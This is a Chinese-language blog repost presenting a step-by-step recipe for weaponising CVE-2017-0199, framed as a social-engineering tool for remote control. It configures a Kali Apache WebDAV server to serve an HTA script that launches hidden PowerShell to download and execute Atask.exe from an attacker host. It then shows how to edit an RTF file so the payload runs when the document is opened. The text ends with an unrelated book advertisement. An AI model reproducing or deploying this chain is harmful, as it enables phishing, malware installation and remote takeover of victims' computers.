内容简介:CVE-2017-0199 Kali做服务器 远控结合 Doc社工神器
Apache利用的是kalia
Kali下2个路径
web 路径 /var/www/html
apace 配置文件路径 /etc/apache2/apache2.conf
准备文件2个
1:poc
POC的内容:
<script>
poc=new ActiveXObject("WScript.Shell");
poc.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://ip_url/Atask.exe\', \'c:/windows/temp/Atask.exe\'); c:/windows/temp/Atask.exe', 0);window.close();
</script>
2:word 文档
随意 例如: a.docx
一:KaLi 开启DAV
a2enmod dav a2enmod dav_fs a2enmod dav_lock a2enmod headers service apache2 restart
二:Kali服务器上操作
mv a.docx /var/www/html/a.rtf
三:本机电脑客户端操作
新建word => 插入 => 对象 -> 文件名字 http://ip/a.rtf 勾选 连接到文件 保存成 rtf文件 (b.rtf)
四:Kali服务器上 删除 /var/www/html/a.rtf 文件,把一开始准备的 poc 复制成 a.rtf
mv poc /var/www/html/a.rtf
之后 修改Apache配置文件 vim /etc/apache2/apache2.conf
增加如下内容:
<Directory /> Dav on </Directory> <Directory /var/www/html/ms/> Header set Content-Type "application/hta" </Directory>
保存 service apache2 restart
五:客户端
用文本编辑器 打开 b.rtf 找到: `\object\objautlink\rsltpict` 替换为 `\object\objautlink\objupdate\rsltpict`:
保存。。。制作完成
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
数据库系统概念
Abraham Silberschatz、Henry F. Korth、S. Sudarshan / 杨冬青、马秀莉、唐世渭 / 机械工业 / 2006-10-01 / 69.50元
本书是数据库系统方面的经典教材之一。国际上许多著名大学包括斯坦福大学、耶鲁大学、得克萨斯大学、康奈尔大学、伊利诺伊大学、印度理工学院等都采用本书作为教科书。我国也有许多所大学采用本书以前版本的中文版作为本科生和研究生的数据库课程的教材和主要教学参考书,收到了良好的效果。 本书调整和新增内容:调整了第4版的讲授顺序。首先介绍SQL及其高级特性,使学生容易接受数据库设计的概念。新增数据库设计的专......一起来看看 《数据库系统概念》 这本书的介绍吧!
